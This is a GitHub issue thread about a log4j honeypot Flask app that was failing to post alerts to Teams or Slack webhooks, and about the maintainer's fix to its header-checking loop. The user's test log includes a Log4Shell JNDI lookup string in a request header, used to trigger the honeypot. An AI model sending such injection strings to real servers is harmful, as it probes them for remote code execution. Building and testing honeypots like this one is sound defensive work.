### ISSUE TITLE
Not posting to teams with webhook

### ISSUE THREAD

**Issue by hitem** [BinaryDefense/log4j-honeypot-flask#2]
Hello, im novice when it comes to python and requests. 
But straight of the bat its not working with a webhook to post anything to teams. I tried slack as well but to no success - booted up a kali, a ubuntu and another linux machine, its same on all of them (no post being made). So i tried a regular Windows machine with a ps1 json post and it went straight into the teams channel -so the hook works. The "listener" is running and i can see my request coming in on the "server" (app.py, in the terminal - and its formatted as json).

I cant tell whats wrong, but its not working. 3 different systems, different hooks (slack, teams and webhook.site). Tried adding print('debug x') here and there and everything seems to work - except the post to be made to to teams.

Maybe its just me.

Im starting the server with commandlines, but i also tried hardcoded variables in the app.py.
``` python3 app/app.py
  Running on all addresses.
   WARNING: This is a development server. Do not use it in a production deployment.
  Running on http://x.x.x.x:4444/ (Press CTRL+C to quit)   #<---- here a curl request is made, it comes through:
('Host', 'x.x.x.x:4444')
('User-Agent', 'curl/7.79.1')
('Accept', '*/*')
('X-Api-Version', '${jndi:ldap://ooof.muchlog4j}')
x.x.x.x - - [15/Dec/2021 13:28:37] "GET / HTTP/1.1" 200 -

```

Just wanted to add that a regular python json post works to the same webhook:
```python
import requests
import json

url = "xxxxxxxxx"

payload = {
    "text": "Sample alert text"
}
headers = {
    'Content-Type': 'application/json'
}
response = requests.post(url, headers=headers, data=json.dumps(payload))
print(response.text.encode('utf8'))
```

**Comment by 4Nzic-fiddler** [comment]
Thank you @hitem for the details! I'm going to see if I can reproduce this behavior and I'll let you know if I find a bug and fix it.

**Comment by 4Nzic-fiddler** [comment]
Oh I think I see the bug already!
`
for header in headers:
     if "${" in header:
            reportHit(request)
`
should be:
`
for header in headers:
   for field in header:
      if "${" in field:
         reportHit(request)
`

I'm going to test that out and see if it works after I reproduce your report

**Comment by 4Nzic-fiddler** [comment]
yep that was it! I fixed the logic and pushed the update. Please give that a try and let me know if that works for you. Thank you so much for the report that led to finding the bug!!

**Comment by hitem** [comment]
@4Nzic-fiddler That works like a charm! Great catch and thanks for the time invested and ofc the honeypot - its greatly appreciated!
